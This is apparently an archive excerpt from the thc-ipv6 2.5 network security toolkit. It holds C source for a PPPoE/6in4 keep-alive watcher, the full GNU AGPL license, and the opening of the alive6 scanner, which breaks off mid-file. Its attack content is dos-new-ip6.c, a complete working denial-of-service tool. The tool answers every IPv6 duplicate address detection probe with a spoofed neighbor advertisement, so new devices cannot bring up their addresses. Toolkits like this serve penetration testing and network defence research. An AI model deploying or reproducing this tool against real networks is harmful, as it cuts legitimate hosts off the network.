((specified) %04x != %04x (seen))\n", htons(*orig), htons(*seen)); } if (data[22 + offset + do_hdr_off] == 9) { printf("Keep-alive request ID 0x%04x seen\n", htons(*seen)); if (passive == 0) { memcpy(buf + 12, data + 12, len - 12); memcpy(buf + 6, data, 6); memcpy(buf, data + 6, 6); buf[22 + offset + do_hdr_off] = 10; hdr.pkt = buf; hdr.pkt_len = len; if (thc_send_pkt(interface, (unsigned char*) &hdr, &len) < 0) { fprintf(stderr, "Error: could not send packet to interface %s (%d)\n", interface, thc_socket); exit(-1); } printf("Keep-alive reply ID 0x%04x sent\n", htons(*seen)); } } else { if (passive && data[22 + offset + do_hdr_off] == 10) printf("Keep-alive reply ID 0x%04x seen\n", htons(*seen)); } } return; } int main(int argc, char *argv[]) { char sndbuf[128], data[] = { 0x09, 0x0a, 0x00, 0x0c, 0xfa, 0xce, 0xba, 0xbe, 0x1f, 0x1e, 0x1d, 0x1c }; time_t passed = 0; pcap_t *p; thc_ipv6_hdr hdr; int sndbuflen = 0, i; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "adp")) >= 0) { switch(i) { case 'a': active = 1; break; case 'd': debug = 1; break; case 'p': passive = 1; break; default: fprintf(stderr, "Error: invalid option -%c\n", i); exit(-1); } } if (getenv("THC_IPV6_PPPOE") != NULL) type = 1; else if (getenv("THC_IPV6_6IN4") != NULL) type = 2; if (type == 0) { fprintf(stderr, "Error: neither the THC_IPV6_PPPOE nor THC_IPV6_6IN4 environment variable is set\n"); exit(-1); } if (type == 2 && active) fprintf(stderr, "Error: active ping6 sending in for THC_IPV6_6IN4 is not possible. Please use thcping6 or alive6 to perform the active alive packet sending.\n"); interface = argv[optind]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } printf("Started %s keep-alive watcher on %s (Press Control-C to end) ...\n", type == 1 ? 
"PPPoE" : "6in4", argv[optind]); if (active == 1 && type == 1) { if ((p = thc_pcap_init_promisc(interface, "it does not matter what we put here")) == NULL) { fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } memcpy(sndbuf, do_hdr, do_hdr_size); sndbuf[18 + do_hdr_off] = 0x00; sndbuf[19 + do_hdr_off] = sizeof(data) + 2; sndbuf[20 + do_hdr_off] = 0xc0; sndbuf[21 + do_hdr_off] = 0x21; memcpy(sndbuf + do_hdr_size, data, sizeof(data)); sndbuflen = do_hdr_size + sizeof(data); hdr.pkt = sndbuf; hdr.pkt_len = sndbuflen; while (1) { thc_pcap_check(p, (char *) intercept, NULL); usleep(100); if (passed <= time(NULL)) { if (thc_send_pkt(interface, (unsigned char*) &hdr, &sndbuflen) < 0) { fprintf(stderr, "Error: could not send packet to interface %s\n", interface); return -1; } passed = time(NULL) + 15; } } } else { thc_pcap_function(interface, "it does not matter what we put here", (char *) intercept, 1, NULL); fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } return -1; // never reached unless error } thc-ipv6-2.5/dos-new-ip6.c0000644000000000000000000000755412251022434013740 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, *dstmac, *dst, matchfoo[16]; int pkt_len = 0; thc_ipv6_hdr *ipv6; int mychecksum; char *interface; char *ptr3, *ptr4; int i; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface\n\n", prg); printf("This tools prevents new IPv6 interfaces to come up, by sending answers to\n"); printf("duplicate ip6 checks (DAD). 
This results in a DOS for new IPv6 devices.\n\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int len = header->caplen - 14; if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len = header->caplen - do_hdr_size; if ((ipv6hdr[0] & 240) != 0x60) return; } if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *) data, header->caplen, "Received Packet"); } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL || header->caplen < 78) return; if (memcmp(matchfoo, ipv6hdr + 8, 16) != 0 && !(ipv6hdr[8] == 0xfe && ipv6hdr[48] != 0xfe)) return; if (debug) printf("DEBUG: packet is a valid duplicate ip6 check via icmp6 neighbor solitication\n"); memcpy(ipv6->pkt + 22, ipv6hdr + 48, 16); // copy target to srcip6 memcpy(ipv6->pkt + 62, ipv6hdr + 48, 16); // copy target to target mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38, NXT_ICMP6, ipv6->pkt + 54, 32); ipv6->pkt[56] = mychecksum / 256; ipv6->pkt[57] = mychecksum % 256; thc_send_pkt(interface, pkt, &pkt_len); ptr4 = thc_ipv62notation(ipv6->pkt + 22); printf("Spoofed packet for existing ip6 as %s\n", ptr4); free(ptr4); if (fork() == 0) { usleep(200); debug = 0; thc_send_pkt(interface, pkt, &pkt_len); exit(0); } ipv6->pkt[56] = 0; ipv6->pkt[57] = 0; // new random mac for next duplicate check for (i = 2; i < 6; i++) ipv6->pkt[6 + i] = rand() % 256; memcpy(ipv6->pkt + 80, ipv6->pkt + 6, 6); (void) wait3(NULL, WNOHANG, NULL); return; } int main(int argc, char *argv[]) { char dummy[24]; unsigned char *ownmac; if (argc == 3 && strncmp(argv[1], "-d", 2) == 0) { argv++; argc--; debug = 1; } if (argc != 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (debug) printf("Preparing spoofed packet for speed-up\n"); interface = argv[1]; if ((ownmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); 
exit(-1); } memset(dummy, 'X', sizeof(dummy)); dummy[16] = 2; dummy[17] = 1; memcpy(&dummy[18], ownmac, 6); dst = thc_resolve6("ff02::1"); dstmac = thc_get_multicast_mac(dst); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_OVERRIDE, dummy, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, ownmac, dstmac, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; memset(ipv6->pkt + 56, 0, 2); // reset checksum to zero srand(time(NULL) + getpid()); for (i = 2; i < 6; i++) // set a random mac, keeping the first two bytes ipv6->pkt[6 + i] = rand() % 256; memcpy(ipv6->pkt + 80, ipv6->pkt + 6, 6); if (debug) { thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet"); printf("\n"); } memset(matchfoo, 0, sizeof(matchfoo)); printf("Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); } thc-ipv6-2.5/LICENSE0000644000000000000000000010510212234222353012520 0ustar rootroot[see the end of the file for the special exception for linking with OpenSSL - debian people need this] GNU AFFERO GENERAL PUBLIC LICENSE Version 3, 19 November 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU Affero General Public License is a free, copyleft license for software and other kinds of works, specifically designed to ensure cooperation with the community in the case of network server software. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, our General Public Licenses are intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. 
When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. Developers that use our General Public Licenses protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License which gives you legal permission to copy, distribute and/or modify the software. A secondary benefit of defending all users' freedom is that improvements made in alternate versions of the program, if they receive widespread use, become available for other developers to incorporate. Many developers of free software are heartened and encouraged by the resulting cooperation. However, in the case of software used on network servers, this result may fail to come about. The GNU General Public License permits making a modified version and letting the public access it on a server without ever releasing its source code to the public. The GNU Affero General Public License is designed specifically to ensure that, in such cases, the modified source code becomes available to the community. It requires the operator of a network server to provide the source code of the modified version running there to the users of that server. Therefore, public use of a modified version, on a publicly accessible server, gives the public access to the source code of the modified version. An older license, called the Affero General Public License and published by Affero, was designed to accomplish similar goals. This is a different license, not a version of the Affero GPL, but Affero has released a new version of the Affero GPL which permits relicensing under this license. 
The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU Affero General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. 
The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. 
The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. 
When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. 
This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. 
b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. 
A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. 
But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. 
Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. 
If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. 
Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. 
The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. 
"Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. 
If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Remote Network Interaction; Use with the GNU General Public License. Notwithstanding any other provision of this License, if you modify the Program, your modified version must prominently offer all users interacting with it remotely through a computer network (if your version supports such interaction) an opportunity to receive the Corresponding Source of your version by providing access to the Corresponding Source from a network server at no charge, through some standard or customary means of facilitating copying of software. This Corresponding Source shall include the Corresponding Source for any work covered by version 3 of the GNU General Public License that is incorporated pursuant to the following paragraph. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the work with which it is combined will remain governed by version 3 of the GNU General Public License. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU Affero General Public License from time to time. 
Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU Affero General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU Affero General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU Affero General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. 
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Also add information on how to contact you by electronic and paper mail. If your software can interact with users remotely through a computer network, you should also make sure that it provides a way for users to get its source. For example, if your program is a web application, its interface could display a "Source" link that leads users to an archive of the code. There are many ways you could offer source, and different solutions will be better for different programs; see section 13 for the specific requirements. You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU AGPL, see <http://www.gnu.org/licenses/>. Special Exception * In addition, as a special exception, the copyright holders give * permission to link the code of portions of this program with the * OpenSSL library under certain conditions as described in each * individual source file, and distribute linked combinations * including the two. * You must obey the GNU Affero General Public License in all respects * for all of the code used other than OpenSSL. If you modify * file(s) with this exception, you may extend this exception to your * version of the file(s), but you are not obligated to do so. If you * do not wish to do so, delete this exception statement from your * version. If you delete this exception statement from all source * files in the program, then also delete it here.
thc-ipv6-2.5/alive6.c0000644000000000000000000015030412254411513013051 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_ALIVE 65536 #define MAX_NETS 1024 #define MAX_VENDID 64 #define MAX_PORTS 256 #define MAX_FOUR 16 #define RESP_PONG "ICMP echo-reply" #define RESP_UNREACH_PORT "ICMP port unreachable" #define RESP_UNREACH_ROUTE "ICMP network unreachable" #define RESP_UNREACH_FW "ICMP firewalled unreachable" #define RESP_UNREACH_OOSCOPE "ICMP out of scope unreachable" #define RESP_UNREACH_ADDR "ICMP host unreachable" #define RESP_UNREACH_GRESS "ICMP ingress/egress filter unreachable" #define RESP_UNREACH_REJECT "ICMP route reject unreachable" #define RESP_TOOBIG "ICMP packet too big" #define RESP_TTLEXCEED "ICMP TTL exceeded" #define RESP_REDIR "ICMP local router traffic redirect" #define RESP_PARAMPROB "ICMP parameter problem" #define RESP_ERROR "ICMP error" #define RESP_UDP "UDP" #define RESP_SYNACK "TCP SYN-ACK" #define RESP_RST "TCP RST" #define RESP_ACK "TCP ACK" #define RESP_OTHER "TCP misc-options" #define RESP_UNKNOWN "unknown" unsigned char buf[8], *alive[MAX_ALIVE], *tagging = NULL; int alive_no = 0, resolve = 0, waittime = 1, rawmode = 0, portscan = 0, curr = 0, list = 0; int synports[MAX_PORTS], ackports[MAX_PORTS], udpports[MAX_PORTS]; int ndp_only = 0, do_ping = 1, do_dst = 1, do_hop = 0, verbose = 0, srcport = -1, do_help = 0, do_hopcount = 0, still_not_there = 0, rst_means_alive = 1; unsigned long int tcount = 0; FILE *out = NULL; struct hostent *he = NULL; short int si, sp, sp2; // all dict entries must start with a single from/to 0,0,0,0 // and end with a single from/to ffff,ffff,ffff,ffff unsigned short int dict[] = { 0, 0, 0, 0, /*to */ 0, 0, 0, 0, 0, 0, 0, 1, /*to */ 0, 0, 0, 0x2ff, // 1975 tests 0, 0, 0, 0x300, /*to */ 0, 0, 0, 0x305, 0, 0, 0, 0x400, /*to */ 0, 0, 0, 0x405, 0, 0, 0, 0x443, /*to */ 0, 0, 0, 0x445, 0, 0, 
